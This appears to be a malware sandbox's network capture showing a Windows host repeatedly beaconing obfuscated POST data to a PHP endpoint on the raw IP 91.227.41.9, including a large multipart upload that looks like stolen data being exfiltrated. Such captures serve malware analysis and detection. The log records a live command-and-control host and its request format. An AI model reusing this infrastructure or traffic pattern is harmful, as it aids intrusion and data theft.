Dec 9, 2024 00:27:13.624420881 CET	2536	OUT	Data Raw: 59 59 43 55 58 41 50 5f 54 57 5b 51 55 50 59 5d 50 59 5a 5f 56 50 57 5a 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: YYCUXAP_TW[QUPY]PYZ_VPWZX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'X'!\<Y4S (5' (; T!8V<0_!" X*?&\"'Z,
Dec 9, 2024 00:27:14.532691002 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:14.773011923 CET	151	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:14 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:15.073219061 CET	238	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue
Dec 9, 2024 00:27:15.421179056 CET	2536	OUT	Data Raw: 5c 5e 46 56 58 45 55 5b 54 57 5b 51 55 5d 59 5f 50 5c 5a 5f 56 54 57 53 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: \^FVXEU[TW[QU]Y_P\Z_VTWSX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_$$-_+:0 6(5$+W<$Z *46 V?9\"2;?/&\"'Z,<
Dec 9, 2024 00:27:16.342046022 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:16.577415943 CET	151	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:16 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:16.986875057 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:17.343085051 CET	2536	OUT	Data Raw: 59 52 43 52 5d 41 55 5f 54 57 5b 51 55 5e 59 58 50 53 5a 5b 56 56 57 5c 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: YRCR]AU_TW[QU^YXPSZ[VVW\X_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'^'.?)# %#Y<=]'(?9 :T"V;+9 ^!1<X<?&\"'Z,0
Dec 9, 2024 00:27:18.284813881 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:18.517462969 CET	207	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:18 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:18.766187906 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2528 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:19.124336958 CET	2528	OUT	Data Raw: 59 5b 46 54 58 4a 55 5a 54 57 5b 51 55 58 59 5c 50 5d 5a 58 56 56 57 53 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: Y[FTXJUZTW[QUXY\P]ZXVVWSX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_$0Y($Y#&'6!_'7W?#!)7P"V#))8610_<&\"'Z,0
Dec 9, 2024 00:27:20.043591022 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:20.277448893 CET	207	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:19 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:19.950061083 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 1856 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:20.296232939 CET	1856	OUT	Data Raw: 59 53 46 57 5d 40 55 59 54 57 5b 51 55 5b 59 58 50 5c 5a 5b 56 55 57 5e 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: YSFW]@UYTW[QU[YXP\Z[VUW^X_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'3)=), 67X(3?( #+6 8)*'61[+?&\"'Z,$

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:25.449067116 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 1856 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:25.796194077 CET	1856	OUT	Data Raw: 59 53 43 52 58 41 55 52 54 57 5b 51 55 5a 59 5d 50 52 5a 5c 56 53 57 5b 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: YSCRXAURTW[QUZY]PRZ\VSW[X_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'_$]?# ++%0?(<:4\ \?5V,)90_!?*?&\"'Z,
Dec 9, 2024 00:27:26.733467102 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:26.969522953 CET	380	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:26 GMT Server: Apache/2.4.58 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0f 13 39 1f 32 18 2b 5f 29 23 2e 0c 2b 02 2f 5d 3a 11 28 58 3c 1e 35 11 31 2e 37 1f 25 01 3d 09 3e 2e 05 1a 27 54 25 1b 24 37 23 55 2a 02 2f 58 07 1c 27 58 3e 28 2f 58 24 30 2e 5e 2a 31 3b 59 27 2e 3c 5c 24 07 38 5d 26 20 3c 5e 3e 20 35 57 25 16 0f 54 2b 05 3c 5c 2d 09 38 54 22 1e 23 53 08 11 26 0e 26 21 0e 59 25 3f 28 59 22 0d 2a 12 27 38 20 08 3d 3c 23 03 3f 23 03 13 3f 31 2d 0f 27 54 3c 55 30 01 2b 04 24 55 32 53 25 10 26 54 2a 00 23 56 03 31 57 50 Data Ascii: 92+_)#.+/]:(X<51.7%=>.'T%$7#U/X'X>(/X$0.^1;Y'.<\$8]& <^> 5W%T+<\-8T"#S&&!Y%?(Y"'8 =<#?#?1-'T<U0+$U2S%&T#V1WP

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:25.572278976 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:25.921263933 CET	2536	OUT	Data Raw: 5c 5c 43 54 58 43 55 52 54 57 5b 51 55 5f 59 5d 50 5b 5a 5c 56 5d 57 5a 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: \\CTXCURTW[QU_Y]P[Z\V]WZX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_$$-<4'[+*'/;(9 8638(:0""0+?&\"'Z,
Dec 9, 2024 00:27:26.911372900 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:27.145360947 CET	207	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:26 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:27.395148993 CET	238	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue
Dec 9, 2024 00:27:27.750787020 CET	2536	OUT	Data Raw: 5c 5b 43 54 5d 46 50 58 54 57 5b 51 55 5c 59 55 50 5a 5a 50 56 50 57 58 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: \[CT]FPXTW[QU\YUPZZPVPWXX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_$$9(9;7%8+&!]3<?0#863<U(:0\518_+?&\"'Z,8
Dec 9, 2024 00:27:28.665081024 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:28.901535034 CET	151	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:28 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:29.161705017 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:29.514961958 CET	2536	OUT	Data Raw: 59 53 43 57 5d 41 55 59 54 57 5b 51 55 51 59 5b 50 5f 5a 5d 56 50 57 53 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: YSCW]AUYTW[QUQY[P_Z]VPWSX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'3="=)' %3[<C='Y7+9+#*W!P<)#"0Y+&\"'Z,
Dec 9, 2024 00:27:30.428956032 CET	25	IN	HTTP/1.1 100 Continue

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:30.577334881 CET	308	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JfPZs2UEFI3gnVXFX8zJCzj4G5RhJ1J6ak User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 188114 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:30.921433926 CET	12360	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 66 50 5a 73 32 55 45 46 49 33 67 6e 56 58 46 58 38 7a 4a 43 7a 6a 34 47 35 52 68 4a 31 4a 36 61 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22 Data Ascii: ------JfPZs2UEFI3gnVXFX8zJCzj4G5RhJ1J6akContent-Disposition: form-data; name="0"Content-Type: text/plainY_CQ]CU^TW[QUZYYP\Z_VQW\X_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^
Dec 9, 2024 00:27:31.042381048 CET	9888	OUT	Data Raw: 6d 54 56 5a 35 4f 62 57 67 67 43 71 54 79 51 44 54 78 71 67 52 46 64 37 5a 64 30 56 72 33 4c 66 42 6a 6c 42 79 6a 2f 2f 52 6e 53 4d 6a 77 6b 4c 54 79 35 74 42 49 72 71 5a 66 54 53 31 61 63 48 4a 58 67 79 67 50 6e 33 71 78 61 55 42 67 59 62 2b 5a Data Ascii: mTVZ5ObWggCqTyQDTxqgRFd7Zd0Vr3LfBjlByj//RnSMjwkLTy5tBIrqZfTS1acHJXgygPn3qxaUBgYb+Ze9hEfrGhKoPtCLOABGdZ9SYzdY+wiUMpCcvIS+DKdSl1ug1M+/eR4Hcy6AV2L7cYxXQM5hDoDiXkT2cZuIUiI13kE0hjMTCjHqHPOJaZBTqEgREVheQisBUYhDM0JGfRnT2/u1bcGOeWvkxQ1a0lWJSMGUjeHQNRS
Dec 9, 2024 00:27:31.042417049 CET	2472	OUT	Data Raw: 55 34 41 6f 30 49 6a 2f 43 75 51 36 71 6d 47 7a 54 75 71 61 63 77 76 39 4c 47 48 7a 2b 30 50 46 37 38 50 35 48 44 65 58 59 6f 50 37 53 64 66 68 4e 54 72 6e 43 4c 46 65 53 46 4f 36 43 37 63 58 6e 6f 38 48 44 70 52 66 2b 76 53 39 76 63 37 52 63 63 Data Ascii: U4Ao0Ij/CuQ6qmGzTuqacwv9LGHz+0PF78P5HDeXYoP7SdfhNTrnCLFeSFO6C7cXno8HDpRf+vS9vc7RccFuCdNRiJgePyiX0D5PeFM7t/4tLKW3vEHC+YzU3xc8NcWIvf43WbQ8tfwdVmKpZpnjdYkfG+fIGkYKeGbo/Zr8xnJZR73ieg2EeCys6lF7s/qbWuuI02U9Rje+Nu3S8w0euL+t0PpawQhP1BayLP4drMGd7aN8una
Dec 9, 2024 00:27:31.043282032 CET	2472	OUT	Data Raw: 62 4c 6a 41 67 78 66 34 41 51 47 31 52 49 65 68 43 36 66 52 73 70 35 75 4c 77 57 77 53 6d 44 52 58 6a 5a 55 6f 4d 76 51 62 45 4b 77 75 2f 50 73 74 55 6b 35 69 30 48 61 52 5a 47 43 37 55 6b 4e 30 6a 4e 61 44 41 41 6b 5a 77 48 53 30 41 42 6a 58 76 Data Ascii: bLjAgxf4AQG1RIehC6fRsp5uLwWwSmDRXjZUoMvQbEKwu/PstUk5i0HaRZGC7UkN0jNaDAAkZwHS0ABjXv7tAviBD/534GxQn4wqNPfEoF/uiUMc9E1vCjW6DuRl8Xlefsbnen1kytRX9MN5CsBq4ICXnNy6tPytqIE7uMFrsnZDMfI8GxaybNjj0bn4KqLc9nSWwgTqRuYEpDJlxJuqJY//h4T/vOmPjxOCT5GzHSehZ7hOLi5
Dec 9, 2024 00:27:31.043350935 CET	2472	OUT	Data Raw: 6a 59 2b 36 76 50 7a 6f 37 47 61 43 39 70 55 41 4a 66 6a 52 7a 54 79 45 35 33 42 42 46 6f 65 43 38 47 59 50 70 50 67 58 4f 66 47 46 72 6b 59 77 57 4f 65 2f 4d 50 77 53 44 79 76 51 6d 58 67 5a 4b 79 35 49 6a 2f 62 67 48 6c 6f 72 69 68 72 6f 54 6b Data Ascii: jY+6vPzo7GaC9pUAJfjRzTyE53BBFoeC8GYPpPgXOfGFrkYwWOe/MPwSDyvQmXgZKy5Ij/bgHlorihroTkpKseF+R3nV4/ZDGH+W4ucZ+vTqidQ7Td/L4XAlufCrzE9DtoZjCje6qTIwoPBqO/sSs2Y/ARgxgpw0S6C9jzlVs9rW9V9KFBwUl5TLzM84rBkg8X+OOvjSH5JUAkdCwCjcHWwmZlG5xZ9h66oO7wsLoo/a0cIxh7A
Dec 9, 2024 00:27:31.043858051 CET	2472	OUT	Data Raw: 38 4f 72 34 6c 6c 6a 76 2f 51 4a 6f 70 6a 35 61 79 61 35 4c 78 4d 7a 6e 6f 31 75 42 71 6e 37 45 36 75 59 64 73 53 77 31 4f 6f 72 59 49 57 46 7a 39 75 2f 51 4c 62 34 33 67 7a 2b 4d 42 69 44 66 34 65 77 66 72 6b 67 58 74 2f 66 30 70 64 44 4d 30 6d Data Ascii: 8Or4lljv/QJopj5aya5LxMzno1uBqn7E6uYdsSw1OorYIWFz9u/QLb43gz+MBiDf4ewfrkgXt/f0pdDM0mj8LTwDro3Jyt/u+8s5tMBKZ2o0Lti3+iNzZHWL/JFwpboiSSTsYPrLbT7/43dOt+5gNEeSZvKLmR8aaq73e2jYByQQIxfnyuSK+HcqsvR0ZNPqolFijGfA8EmedCxkhOpp54ZxfauT3lHcycd7b7gY7xEvCjK6jMk
Dec 9, 2024 00:27:31.043875933 CET	2472	OUT	Data Raw: 6e 35 35 33 72 62 39 30 30 62 49 74 41 6c 62 47 4e 6e 70 48 2f 70 48 6a 64 39 75 4d 62 6c 31 2f 51 38 6f 69 74 62 56 6b 69 34 71 50 44 35 74 65 39 50 31 52 76 37 73 36 50 54 7a 48 39 38 61 63 4c 4a 65 36 43 6a 48 30 31 45 74 30 59 37 58 67 76 63 Data Ascii: n553rb900bItAlbGNnpH/pHjd9uMbl1/Q8oitbVki4qPD5te9P1Rv7s6PTzH98acLJe6CjH01Et0Y7Xgvc+UFiW6fHs+LJAL9u4Gd5Yb7d3WiFeyvQoln6x7bz8Vcta+MxF06zf/yC2aqZGXaTMMpZs+rVIaCsvtJ+l77gJMEZaMSpoy8uPOJ53mfgc82AKq27naCdUprrQlpq+ZOy8hEqAGEgnXbVkahwOto6P06CTpP5wBwRS
Dec 9, 2024 00:27:31.046083927 CET	2472	OUT	Data Raw: 34 64 6e 36 2b 6b 6e 5a 4c 65 44 57 59 48 58 34 41 31 74 58 4e 56 59 4d 4e 69 78 32 38 4e 44 41 2b 67 30 4b 42 51 74 59 6d 6e 57 44 61 4b 69 45 53 61 44 5a 64 2f 45 74 30 5a 79 6b 45 57 44 58 64 47 79 64 52 4e 6d 64 50 6a 30 2f 71 55 37 4a 59 48 Data Ascii: 4dn6+knZLeDWYHX4A1tXNVYMNix28NDA+g0KBQtYmnWDaKiESaDZd/Et0ZykEWDXdGydRNmdPj0/qU7JYHWfjIst/MTjKXcC8kmIL0cu6JzCf8xCOdrZ8hjjAj3897MYM7/T6HCCGsLZaKQNrFiQuqV1iytIUokVJTa4aysa0Cfyw7CX1lGDwnghZ8Bg9gpecHLXOwPTo26DCAfRbsNl/H+TBYwj+RnebDdBewg1fyI85YDwo0X
Dec 9, 2024 00:27:31.163840055 CET	2472	OUT	Data Raw: 36 2f 73 53 2b 6c 4a 66 31 37 71 4b 73 69 75 41 70 64 2b 78 37 56 4c 61 2b 4c 4b 6a 34 45 2b 55 52 42 54 62 46 31 56 45 30 72 37 43 51 4e 31 34 62 55 48 72 59 73 47 4d 44 7a 4b 50 70 48 54 76 70 70 72 37 2f 42 32 73 6f 6e 47 67 70 59 6d 48 4b 30 Data Ascii: 6/sS+lJf17qKsiuApd+x7VLa+LKj4E+URBTbF1VE0r7CQN14bUHrYsGMDzKPpHTvppr7/B2sonGgpYmHK0TfT2OoeLBvR0RW7qYFUebHumVXt7fLhf2DKZZOkYYDB7jlLeDNYV4SIQCc95Oer8H40vDGuTILX07Gd302muDgWpCm7m7pecCIO3eEiiG4DOD9Ce5Q8K+pXKf4VxS/Q/FPi2f176CwhCRyJD6UZBEcn5olMf+W2NI
Dec 9, 2024 00:27:31.163858891 CET	2472	OUT	Data Raw: 5a 67 71 2f 33 62 30 74 76 5a 33 53 65 69 47 73 6e 6f 73 4f 5a 70 68 70 55 6e 48 71 63 64 7a 35 74 75 62 6e 36 71 53 77 75 69 2b 57 59 62 32 6c 69 6e 7a 42 2f 39 30 34 6e 4f 5a 68 68 4d 34 56 50 61 45 66 59 52 70 6d 58 39 6e 6e 73 34 6f 2f 54 59 Data Ascii: Zgq/3b0tvZ3SeiGsnosOZphpUnHqcdz5tubn6qSwui+WYb2linzB/904nOZhhM4VPaEfYRpmX9nns4o/TY2z5cb1usXO5wtN3Ku5fbtjc6dj2zelz6YKXpS4jIu3+LXTGJMGGGggTYA9OYX75f1CP8o3ejc4j9sCVqIsGXBEJ/HmGTBiiS2zNjHvtpPuduaMUBr13pcvM7OiojhMZhUJDdeoLki+NVpdOvB3eHAxQCiQt1k3hYG
Dec 9, 2024 00:27:31.845737934 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:32.543358088 CET	207	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:31 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X
Dec 9, 2024 00:27:32.543648005 CET	238	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 1860 Expect: 100-continue
Dec 9, 2024 00:27:32.983767986 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:33.431360006 CET	324	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:32 GMT Server: Apache/2.4.58 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0f 13 3a 08 25 36 37 58 2a 20 2d 53 2b 2c 23 16 2d 2c 38 1e 3c 0e 3d 13 31 07 24 0e 26 16 2a 1f 2b 00 23 15 33 0c 25 57 24 37 05 50 3e 02 2f 58 07 1c 24 00 28 15 09 5c 25 33 32 5e 29 1f 27 58 32 3e 24 5d 26 3e 05 02 30 30 34 5e 3c 1d 39 54 32 06 3d 51 3f 15 30 14 2d 37 23 0e 36 34 23 53 08 11 26 08 30 1f 38 1f 27 2c 28 59 35 0d 3a 56 30 05 33 55 3d 05 3b 06 28 55 2d 5a 3c 32 2e 1f 30 32 24 1e 30 06 3b 07 24 55 21 0e 24 3a 26 54 2a 00 23 56 03 31 57 50 Data Ascii: :%67X* -S+,#-,8<=1$&+#3%W$7P>/X$(\%32^)'X2>$]&>004^<9T2=Q?0-7#64#S&08',(Y5:V03U=;(U-Z<2.02$0;$U!$:&T#V1WP

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:30.725287914 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:31.077488899 CET	2532	OUT	Data Raw: 59 5a 43 51 5d 41 55 5f 54 57 5b 51 55 58 59 5b 50 59 5a 59 56 56 57 5c 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: YZCQ]AU_TW[QUXY[PYZYVVW\X_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_$&=)_<* Y"%+(1&<$+)\7"/?9$!8Z+/&\"'Z,
Dec 9, 2024 00:27:32.000683069 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:32.237380028 CET	207	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:31 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:32.474981070 CET	238	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue
